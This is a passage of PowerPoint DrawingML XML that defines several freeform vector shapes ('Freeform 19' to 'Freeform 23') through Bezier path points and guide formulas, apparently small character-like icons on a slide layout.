                    <a:pt x="8" y="26"/>
                    <a:pt x="9" y="27"/>
                    <a:pt x="11" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="26"/>
                    <a:pt x="14" y="25"/>
                    <a:pt x="15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24"/>
                    <a:pt x="7" y="24"/>
                    <a:pt x="6" y="25"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="17" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="3"/>
                    <a:pt x="19" y="3"/>
                    <a:pt x="19" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="4"/>
                    <a:pt x="17" y="6"/>
                    <a:pt x="15" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="7"/>
                    <a:pt x="14" y="7"/>
                    <a:pt x="14" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="5"/>
                    <a:pt x="16" y="3"/>
                    <a:pt x="17" y="1"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="23" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="1"/>
                    <a:pt x="26" y="1"/>
                    <a:pt x="26" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="3"/>
                    <a:pt x="25" y="5"/>
                    <a:pt x="25" y="7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3" y="9"/>
                    <a:pt x="33" y="9"/>
                    <a:pt x="33" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="16"/>
                    <a:pt x="31" y="22"/>
                    <a:pt x="29" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="28"/>
                    <a:pt x="33" y="30"/>
                    <a:pt x="36" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="33"/>
                    <a:pt x="34" y="34"/>
                    <a:pt x="34" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="33"/>
                    <a:pt x="29" y="31"/>
                    <a:pt x="27" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="31"/>
                    <a:pt x="22" y="33"/>
                    <a:pt x="19" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="35"/>
                    <a:pt x="18" y="34"/>
                    <a:pt x="17" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="31"/>
                    <a:pt x="23" y="28"/>
                    <a:pt x="25" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="22"/>
                    <a:pt x="22" y="19"/>
                    <a:pt x="21" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="15"/>
                    <a:pt x="20" y="16"/>
                    <a:pt x="20" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="16"/>
                    <a:pt x="19" y="15"/>
                    <a:pt x="18" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="11"/>
                    <a:pt x="23" y="6"/>
                    <a:pt x="23" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="30" y="9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4" y="15"/>
                    <a:pt x="25" y="19"/>
                    <a:pt x="27" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="20"/>
                    <a:pt x="30" y="15"/>
                    <a:pt x="3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3" name="Freeform 19"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7717068" y="-267218"/>
              <a:ext cx="57635" cy="57636"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 35"/>
                <a:gd name="T1" fmla="*/ 21 h 34"/>
                <a:gd name="T2" fmla="*/ 17 w 35"/>
                <a:gd name="T3" fmla="*/ 21 h 34"/>
                <a:gd name="T4" fmla="*/ 17 w 35"/>
                <a:gd name="T5" fmla="*/ 19 h 34"/>
                <a:gd name="T6" fmla="*/ 23 w 35"/>
                <a:gd name="T7" fmla="*/ 14 h 34"/>
                <a:gd name="T8" fmla="*/ 6 w 35"/>
                <a:gd name="T9" fmla="*/ 14 h 34"/>
                <a:gd name="T10" fmla="*/ 6 w 35"/>
                <a:gd name="T11" fmla="*/ 12 h 34"/>
                <a:gd name="T12" fmla="*/ 28 w 35"/>
                <a:gd name="T13" fmla="*/ 12 h 34"/>
                <a:gd name="T14" fmla="*/ 28 w 35"/>
                <a:gd name="T15" fmla="*/ 15 h 34"/>
                <a:gd name="T16" fmla="*/ 19 w 35"/>
                <a:gd name="T17" fmla="*/ 20 h 34"/>
                <a:gd name="T18" fmla="*/ 19 w 35"/>
                <a:gd name="T19" fmla="*/ 21 h 34"/>
                <a:gd name="T20" fmla="*/ 35 w 35"/>
                <a:gd name="T21" fmla="*/ 21 h 34"/>
                <a:gd name="T22" fmla="*/ 35 w 35"/>
                <a:gd name="T23" fmla="*/ 23 h 34"/>
                <a:gd name="T24" fmla="*/ 19 w 35"/>
                <a:gd name="T25" fmla="*/ 23 h 34"/>
                <a:gd name="T26" fmla="*/ 19 w 35"/>
                <a:gd name="T27" fmla="*/ 30 h 34"/>
                <a:gd name="T28" fmla="*/ 15 w 35"/>
                <a:gd name="T29" fmla="*/ 34 h 34"/>
                <a:gd name="T30" fmla="*/ 10 w 35"/>
                <a:gd name="T31" fmla="*/ 34 h 34"/>
                <a:gd name="T32" fmla="*/ 9 w 35"/>
                <a:gd name="T33" fmla="*/ 31 h 34"/>
                <a:gd name="T34" fmla="*/ 14 w 35"/>
                <a:gd name="T35" fmla="*/ 32 h 34"/>
                <a:gd name="T36" fmla="*/ 17 w 35"/>
                <a:gd name="T37" fmla="*/ 29 h 34"/>
                <a:gd name="T38" fmla="*/ 17 w 35"/>
                <a:gd name="T39" fmla="*/ 23 h 34"/>
                <a:gd name="T40" fmla="*/ 0 w 35"/>
                <a:gd name="T41" fmla="*/ 23 h 34"/>
                <a:gd name="T42" fmla="*/ 0 w 35"/>
                <a:gd name="T43" fmla="*/ 21 h 34"/>
                <a:gd name="T44" fmla="*/ 1 w 35"/>
                <a:gd name="T45" fmla="*/ 5 h 34"/>
                <a:gd name="T46" fmla="*/ 18 w 35"/>
                <a:gd name="T47" fmla="*/ 5 h 34"/>
                <a:gd name="T48" fmla="*/ 14 w 35"/>
                <a:gd name="T49" fmla="*/ 1 h 34"/>
                <a:gd name="T50" fmla="*/ 17 w 35"/>
                <a:gd name="T51" fmla="*/ 0 h 34"/>
                <a:gd name="T52" fmla="*/ 20 w 35"/>
                <a:gd name="T53" fmla="*/ 4 h 34"/>
                <a:gd name="T54" fmla="*/ 19 w 35"/>
                <a:gd name="T55" fmla="*/ 5 h 34"/>
                <a:gd name="T56" fmla="*/ 34 w 35"/>
                <a:gd name="T57" fmla="*/ 5 h 34"/>
                <a:gd name="T58" fmla="*/ 34 w 35"/>
                <a:gd name="T59" fmla="*/ 12 h 34"/>
                <a:gd name="T60" fmla="*/ 31 w 35"/>
                <a:gd name="T61" fmla="*/ 12 h 34"/>
                <a:gd name="T62" fmla="*/ 31 w 35"/>
                <a:gd name="T63" fmla="*/ 8 h 34"/>
                <a:gd name="T64" fmla="*/ 4 w 35"/>
                <a:gd name="T65" fmla="*/ 8 h 34"/>
                <a:gd name="T66" fmla="*/ 4 w 35"/>
                <a:gd name="T67" fmla="*/ 12 h 34"/>
                <a:gd name="T68" fmla="*/ 1 w 35"/>
                <a:gd name="T69" fmla="*/ 12 h 34"/>
                <a:gd name="T70" fmla="*/ 1 w 35"/>
                <a:gd name="T71" fmla="*/ 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" h="34">
                  <a:moveTo>
                    <a:pt x="0" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="21"/>
                    <a:pt x="17" y="21"/>
                    <a:pt x="17" y="21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23" y="14"/>
                    <a:pt x="23" y="14"/>
                    <a:pt x="23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3"/>
                    <a:pt x="18" y="34"/>
                    <a:pt x="15" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="34"/>
                    <a:pt x="12" y="34"/>
                    <a:pt x="10" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="33"/>
                    <a:pt x="9" y="32"/>
                    <a:pt x="9" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="31"/>
                    <a:pt x="13" y="32"/>
                    <a:pt x="14" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="32"/>
                    <a:pt x="17" y="31"/>
                    <a:pt x="17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1"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1" y="5"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="5"/>
                    <a:pt x="18" y="5"/>
                    <a:pt x="18" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="4"/>
                    <a:pt x="16" y="3"/>
                    <a:pt x="14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4" name="Freeform 20"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7831560" y="-267218"/>
              <a:ext cx="58415" cy="57636"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 35"/>
                <a:gd name="T1" fmla="*/ 17 h 34"/>
                <a:gd name="T2" fmla="*/ 9 w 35"/>
                <a:gd name="T3" fmla="*/ 0 h 34"/>
                <a:gd name="T4" fmla="*/ 12 w 35"/>
                <a:gd name="T5" fmla="*/ 1 h 34"/>
                <a:gd name="T6" fmla="*/ 9 w 35"/>
                <a:gd name="T7" fmla="*/ 9 h 34"/>
                <a:gd name="T8" fmla="*/ 9 w 35"/>
                <a:gd name="T9" fmla="*/ 34 h 34"/>
                <a:gd name="T10" fmla="*/ 6 w 35"/>
                <a:gd name="T11" fmla="*/ 34 h 34"/>
                <a:gd name="T12" fmla="*/ 6 w 35"/>
                <a:gd name="T13" fmla="*/ 15 h 34"/>
                <a:gd name="T14" fmla="*/ 1 w 35"/>
                <a:gd name="T15" fmla="*/ 21 h 34"/>
                <a:gd name="T16" fmla="*/ 0 w 35"/>
                <a:gd name="T17" fmla="*/ 17 h 34"/>
                <a:gd name="T18" fmla="*/ 10 w 35"/>
                <a:gd name="T19" fmla="*/ 22 h 34"/>
                <a:gd name="T20" fmla="*/ 19 w 35"/>
                <a:gd name="T21" fmla="*/ 17 h 34"/>
                <a:gd name="T22" fmla="*/ 19 w 35"/>
                <a:gd name="T23" fmla="*/ 1 h 34"/>
                <a:gd name="T24" fmla="*/ 22 w 35"/>
                <a:gd name="T25" fmla="*/ 1 h 34"/>
                <a:gd name="T26" fmla="*/ 22 w 35"/>
                <a:gd name="T27" fmla="*/ 15 h 34"/>
                <a:gd name="T28" fmla="*/ 31 w 35"/>
                <a:gd name="T29" fmla="*/ 5 h 34"/>
                <a:gd name="T30" fmla="*/ 34 w 35"/>
                <a:gd name="T31" fmla="*/ 6 h 34"/>
                <a:gd name="T32" fmla="*/ 22 w 35"/>
                <a:gd name="T33" fmla="*/ 18 h 34"/>
                <a:gd name="T34" fmla="*/ 22 w 35"/>
                <a:gd name="T35" fmla="*/ 28 h 34"/>
                <a:gd name="T36" fmla="*/ 24 w 35"/>
                <a:gd name="T37" fmla="*/ 31 h 34"/>
                <a:gd name="T38" fmla="*/ 29 w 35"/>
                <a:gd name="T39" fmla="*/ 31 h 34"/>
                <a:gd name="T40" fmla="*/ 31 w 35"/>
                <a:gd name="T41" fmla="*/ 28 h 34"/>
                <a:gd name="T42" fmla="*/ 32 w 35"/>
                <a:gd name="T43" fmla="*/ 23 h 34"/>
                <a:gd name="T44" fmla="*/ 35 w 35"/>
                <a:gd name="T45" fmla="*/ 24 h 34"/>
                <a:gd name="T46" fmla="*/ 34 w 35"/>
                <a:gd name="T47" fmla="*/ 29 h 34"/>
                <a:gd name="T48" fmla="*/ 29 w 35"/>
                <a:gd name="T49" fmla="*/ 33 h 34"/>
                <a:gd name="T50" fmla="*/ 23 w 35"/>
                <a:gd name="T51" fmla="*/ 33 h 34"/>
                <a:gd name="T52" fmla="*/ 19 w 35"/>
                <a:gd name="T53" fmla="*/ 29 h 34"/>
                <a:gd name="T54" fmla="*/ 19 w 35"/>
                <a:gd name="T55" fmla="*/ 20 h 34"/>
                <a:gd name="T56" fmla="*/ 12 w 35"/>
                <a:gd name="T57" fmla="*/ 24 h 34"/>
                <a:gd name="T58" fmla="*/ 10 w 35"/>
                <a:gd name="T59" fmla="*/ 2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4">
                  <a:moveTo>
                    <a:pt x="0" y="17"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="12"/>
                    <a:pt x="7" y="6"/>
                    <a:pt x="9" y="0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4"/>
                    <a:pt x="10" y="7"/>
                    <a:pt x="9" y="9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7"/>
                    <a:pt x="3" y="19"/>
                    <a:pt x="1" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="20"/>
                    <a:pt x="1" y="19"/>
                    <a:pt x="0" y="17"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10" y="22"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="20"/>
                    <a:pt x="16" y="19"/>
                    <a:pt x="19" y="17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5" y="12"/>
                    <a:pt x="28" y="8"/>
                    <a:pt x="31" y="5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0" y="11"/>
                    <a:pt x="26" y="15"/>
                    <a:pt x="22" y="18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2" y="30"/>
                    <a:pt x="23" y="31"/>
                    <a:pt x="24" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="31"/>
                    <a:pt x="29" y="31"/>
                    <a:pt x="29" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="31"/>
                    <a:pt x="31" y="30"/>
                    <a:pt x="31" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="27"/>
                    <a:pt x="32" y="25"/>
                    <a:pt x="32" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="23"/>
                    <a:pt x="34" y="24"/>
                    <a:pt x="35" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="26"/>
                    <a:pt x="35" y="28"/>
                    <a:pt x="34" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="32"/>
                    <a:pt x="32" y="33"/>
                    <a:pt x="29" y="33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20" y="33"/>
                    <a:pt x="19" y="32"/>
                    <a:pt x="19" y="29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16" y="22"/>
                    <a:pt x="14" y="23"/>
                    <a:pt x="12" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="24"/>
                    <a:pt x="11" y="23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5" name="Freeform 21"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7948389" y="-267218"/>
              <a:ext cx="56078" cy="59193"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 34"/>
                <a:gd name="T1" fmla="*/ 32 h 35"/>
                <a:gd name="T2" fmla="*/ 15 w 34"/>
                <a:gd name="T3" fmla="*/ 27 h 35"/>
                <a:gd name="T4" fmla="*/ 6 w 34"/>
                <a:gd name="T5" fmla="*/ 23 h 35"/>
                <a:gd name="T6" fmla="*/ 9 w 34"/>
                <a:gd name="T7" fmla="*/ 18 h 35"/>
                <a:gd name="T8" fmla="*/ 0 w 34"/>
                <a:gd name="T9" fmla="*/ 18 h 35"/>
                <a:gd name="T10" fmla="*/ 0 w 34"/>
                <a:gd name="T11" fmla="*/ 15 h 35"/>
                <a:gd name="T12" fmla="*/ 10 w 34"/>
                <a:gd name="T13" fmla="*/ 15 h 35"/>
                <a:gd name="T14" fmla="*/ 14 w 34"/>
                <a:gd name="T15" fmla="*/ 9 h 35"/>
                <a:gd name="T16" fmla="*/ 17 w 34"/>
                <a:gd name="T17" fmla="*/ 10 h 35"/>
                <a:gd name="T18" fmla="*/ 14 w 34"/>
                <a:gd name="T19" fmla="*/ 15 h 35"/>
                <a:gd name="T20" fmla="*/ 34 w 34"/>
                <a:gd name="T21" fmla="*/ 15 h 35"/>
                <a:gd name="T22" fmla="*/ 34 w 34"/>
                <a:gd name="T23" fmla="*/ 18 h 35"/>
                <a:gd name="T24" fmla="*/ 27 w 34"/>
                <a:gd name="T25" fmla="*/ 18 h 35"/>
                <a:gd name="T26" fmla="*/ 21 w 34"/>
                <a:gd name="T27" fmla="*/ 27 h 35"/>
                <a:gd name="T28" fmla="*/ 32 w 34"/>
                <a:gd name="T29" fmla="*/ 32 h 35"/>
                <a:gd name="T30" fmla="*/ 30 w 34"/>
                <a:gd name="T31" fmla="*/ 35 h 35"/>
                <a:gd name="T32" fmla="*/ 18 w 34"/>
                <a:gd name="T33" fmla="*/ 29 h 35"/>
                <a:gd name="T34" fmla="*/ 2 w 34"/>
                <a:gd name="T35" fmla="*/ 35 h 35"/>
                <a:gd name="T36" fmla="*/ 1 w 34"/>
                <a:gd name="T37" fmla="*/ 32 h 35"/>
                <a:gd name="T38" fmla="*/ 1 w 34"/>
                <a:gd name="T39" fmla="*/ 5 h 35"/>
                <a:gd name="T40" fmla="*/ 17 w 34"/>
                <a:gd name="T41" fmla="*/ 5 h 35"/>
                <a:gd name="T42" fmla="*/ 14 w 34"/>
                <a:gd name="T43" fmla="*/ 1 h 35"/>
                <a:gd name="T44" fmla="*/ 16 w 34"/>
                <a:gd name="T45" fmla="*/ 0 h 35"/>
                <a:gd name="T46" fmla="*/ 20 w 34"/>
                <a:gd name="T47" fmla="*/ 4 h 35"/>
                <a:gd name="T48" fmla="*/ 18 w 34"/>
                <a:gd name="T49" fmla="*/ 5 h 35"/>
                <a:gd name="T50" fmla="*/ 33 w 34"/>
                <a:gd name="T51" fmla="*/ 5 h 35"/>
                <a:gd name="T52" fmla="*/ 33 w 34"/>
                <a:gd name="T53" fmla="*/ 12 h 35"/>
                <a:gd name="T54" fmla="*/ 30 w 34"/>
                <a:gd name="T55" fmla="*/ 12 h 35"/>
                <a:gd name="T56" fmla="*/ 30 w 34"/>
                <a:gd name="T57" fmla="*/ 8 h 35"/>
                <a:gd name="T58" fmla="*/ 4 w 34"/>
                <a:gd name="T59" fmla="*/ 8 h 35"/>
                <a:gd name="T60" fmla="*/ 4 w 34"/>
                <a:gd name="T61" fmla="*/ 12 h 35"/>
                <a:gd name="T62" fmla="*/ 1 w 34"/>
                <a:gd name="T63" fmla="*/ 12 h 35"/>
                <a:gd name="T64" fmla="*/ 1 w 34"/>
                <a:gd name="T65" fmla="*/ 5 h 35"/>
                <a:gd name="T66" fmla="*/ 10 w 34"/>
                <a:gd name="T67" fmla="*/ 22 h 35"/>
                <a:gd name="T68" fmla="*/ 18 w 34"/>
                <a:gd name="T69" fmla="*/ 25 h 35"/>
                <a:gd name="T70" fmla="*/ 24 w 34"/>
                <a:gd name="T71" fmla="*/ 18 h 35"/>
                <a:gd name="T72" fmla="*/ 12 w 34"/>
                <a:gd name="T73" fmla="*/ 18 h 35"/>
                <a:gd name="T74" fmla="*/ 10 w 34"/>
                <a:gd name="T7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35">
                  <a:moveTo>
                    <a:pt x="1" y="32"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="31"/>
                    <a:pt x="12" y="29"/>
                    <a:pt x="15" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="26"/>
                    <a:pt x="9" y="24"/>
                    <a:pt x="6" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="21"/>
                    <a:pt x="8" y="19"/>
                    <a:pt x="9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2" y="13"/>
                    <a:pt x="13" y="11"/>
                    <a:pt x="14" y="9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12"/>
                    <a:pt x="15" y="13"/>
                    <a:pt x="14" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="15"/>
                    <a:pt x="34" y="15"/>
                    <a:pt x="34" y="15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26" y="21"/>
                    <a:pt x="24" y="24"/>
                    <a:pt x="21" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="28"/>
                    <a:pt x="28" y="30"/>
                    <a:pt x="32" y="32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7" y="33"/>
                    <a:pt x="23" y="31"/>
                    <a:pt x="18" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="32"/>
                    <a:pt x="9" y="33"/>
                    <a:pt x="2" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="34"/>
                    <a:pt x="1" y="33"/>
                    <a:pt x="1" y="32"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1" y="5"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="5"/>
                    <a:pt x="17" y="5"/>
                    <a:pt x="17" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="4"/>
                    <a:pt x="15" y="3"/>
                    <a:pt x="14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1"/>
                    <a:pt x="19" y="3"/>
                    <a:pt x="20" y="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33" y="5"/>
                    <a:pt x="33" y="5"/>
                    <a:pt x="33" y="5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5"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10" y="22"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="23"/>
                    <a:pt x="15" y="24"/>
                    <a:pt x="18" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="23"/>
                    <a:pt x="23" y="21"/>
                    <a:pt x="24" y="18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9"/>
                    <a:pt x="10" y="20"/>
                    <a:pt x="10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6" name="Freeform 22"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8062881" y="-265661"/>
              <a:ext cx="58415" cy="54520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 20 w 35"/>
                <a:gd name="T1" fmla="*/ 0 h 32"/>
                <a:gd name="T2" fmla="*/ 19 w 35"/>
                <a:gd name="T3" fmla="*/ 0 h 32"/>
                <a:gd name="T4" fmla="*/ 35 w 35"/>
                <a:gd name="T5" fmla="*/ 12 h 32"/>
                <a:gd name="T6" fmla="*/ 33 w 35"/>
                <a:gd name="T7" fmla="*/ 15 h 32"/>
                <a:gd name="T8" fmla="*/ 17 w 35"/>
                <a:gd name="T9" fmla="*/ 3 h 32"/>
                <a:gd name="T10" fmla="*/ 2 w 35"/>
                <a:gd name="T11" fmla="*/ 15 h 32"/>
                <a:gd name="T12" fmla="*/ 0 w 35"/>
                <a:gd name="T13" fmla="*/ 13 h 32"/>
                <a:gd name="T14" fmla="*/ 16 w 35"/>
                <a:gd name="T15" fmla="*/ 0 h 32"/>
                <a:gd name="T16" fmla="*/ 20 w 35"/>
                <a:gd name="T17" fmla="*/ 0 h 32"/>
                <a:gd name="T18" fmla="*/ 1 w 35"/>
                <a:gd name="T19" fmla="*/ 30 h 32"/>
                <a:gd name="T20" fmla="*/ 16 w 35"/>
                <a:gd name="T21" fmla="*/ 30 h 32"/>
                <a:gd name="T22" fmla="*/ 16 w 35"/>
                <a:gd name="T23" fmla="*/ 23 h 32"/>
                <a:gd name="T24" fmla="*/ 5 w 35"/>
                <a:gd name="T25" fmla="*/ 23 h 32"/>
                <a:gd name="T26" fmla="*/ 5 w 35"/>
                <a:gd name="T27" fmla="*/ 21 h 32"/>
                <a:gd name="T28" fmla="*/ 16 w 35"/>
                <a:gd name="T29" fmla="*/ 21 h 32"/>
                <a:gd name="T30" fmla="*/ 16 w 35"/>
                <a:gd name="T31" fmla="*/ 15 h 32"/>
                <a:gd name="T32" fmla="*/ 6 w 35"/>
                <a:gd name="T33" fmla="*/ 15 h 32"/>
                <a:gd name="T34" fmla="*/ 6 w 35"/>
                <a:gd name="T35" fmla="*/ 13 h 32"/>
                <a:gd name="T36" fmla="*/ 29 w 35"/>
                <a:gd name="T37" fmla="*/ 13 h 32"/>
                <a:gd name="T38" fmla="*/ 29 w 35"/>
                <a:gd name="T39" fmla="*/ 15 h 32"/>
                <a:gd name="T40" fmla="*/ 19 w 35"/>
                <a:gd name="T41" fmla="*/ 15 h 32"/>
                <a:gd name="T42" fmla="*/ 19 w 35"/>
                <a:gd name="T43" fmla="*/ 21 h 32"/>
                <a:gd name="T44" fmla="*/ 30 w 35"/>
                <a:gd name="T45" fmla="*/ 21 h 32"/>
                <a:gd name="T46" fmla="*/ 30 w 35"/>
                <a:gd name="T47" fmla="*/ 23 h 32"/>
                <a:gd name="T48" fmla="*/ 19 w 35"/>
                <a:gd name="T49" fmla="*/ 23 h 32"/>
                <a:gd name="T50" fmla="*/ 19 w 35"/>
                <a:gd name="T51" fmla="*/ 30 h 32"/>
                <a:gd name="T52" fmla="*/ 33 w 35"/>
                <a:gd name="T53" fmla="*/ 30 h 32"/>
                <a:gd name="T54" fmla="*/ 33 w 35"/>
                <a:gd name="T55" fmla="*/ 32 h 32"/>
                <a:gd name="T56" fmla="*/ 1 w 35"/>
                <a:gd name="T57" fmla="*/ 32 h 32"/>
                <a:gd name="T58" fmla="*/ 1 w 35"/>
                <a:gd name="T59" fmla="*/ 3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5" h="32">
                  <a:moveTo>
                    <a:pt x="20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23" y="6"/>
                    <a:pt x="28" y="9"/>
                    <a:pt x="35" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="13"/>
                    <a:pt x="34" y="14"/>
                    <a:pt x="33" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="12"/>
                    <a:pt x="22" y="8"/>
                    <a:pt x="17" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="7"/>
                    <a:pt x="9" y="11"/>
                    <a:pt x="2" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="15"/>
                    <a:pt x="0" y="14"/>
                    <a:pt x="0" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="9"/>
                    <a:pt x="13" y="5"/>
                    <a:pt x="16" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1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21"/>
                    <a:pt x="19" y="21"/>
                    <a:pt x="19" y="21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19" y="23"/>
                    <a:pt x="19" y="23"/>
                    <a:pt x="19" y="23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1" y="32"/>
                    <a:pt x="1" y="32"/>
                    <a:pt x="1" y="3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7" name="Freeform 23"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8181267" y="-267218"/>
              <a:ext cx="52962" cy="57636"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 32"/>
                <a:gd name="T1" fmla="*/ 6 h 34"/>
                <a:gd name="T2" fmla="*/ 3 w 32"/>
                <a:gd name="T3" fmla="*/ 6 h 34"/>
                <a:gd name="T4" fmla="*/ 5 w 32"/>
                <a:gd name="T5" fmla="*/ 0 h 34"/>
                <a:gd name="T6" fmla="*/ 8 w 32"/>
                <a:gd name="T7" fmla="*/ 1 h 34"/>
                <a:gd name="T8" fmla="*/ 6 w 32"/>
                <a:gd name="T9" fmla="*/ 6 h 34"/>
                <a:gd name="T10" fmla="*/ 13 w 32"/>
                <a:gd name="T11" fmla="*/ 6 h 34"/>
                <a:gd name="T12" fmla="*/ 13 w 32"/>
                <a:gd name="T13" fmla="*/ 34 h 34"/>
                <a:gd name="T14" fmla="*/ 10 w 32"/>
                <a:gd name="T15" fmla="*/ 34 h 34"/>
                <a:gd name="T16" fmla="*/ 10 w 32"/>
                <a:gd name="T17" fmla="*/ 31 h 34"/>
                <a:gd name="T18" fmla="*/ 2 w 32"/>
                <a:gd name="T19" fmla="*/ 31 h 34"/>
                <a:gd name="T20" fmla="*/ 2 w 32"/>
                <a:gd name="T21" fmla="*/ 34 h 34"/>
                <a:gd name="T22" fmla="*/ 0 w 32"/>
                <a:gd name="T23" fmla="*/ 34 h 34"/>
                <a:gd name="T24" fmla="*/ 0 w 32"/>
                <a:gd name="T25" fmla="*/ 6 h 34"/>
                <a:gd name="T26" fmla="*/ 10 w 32"/>
                <a:gd name="T27" fmla="*/ 9 h 34"/>
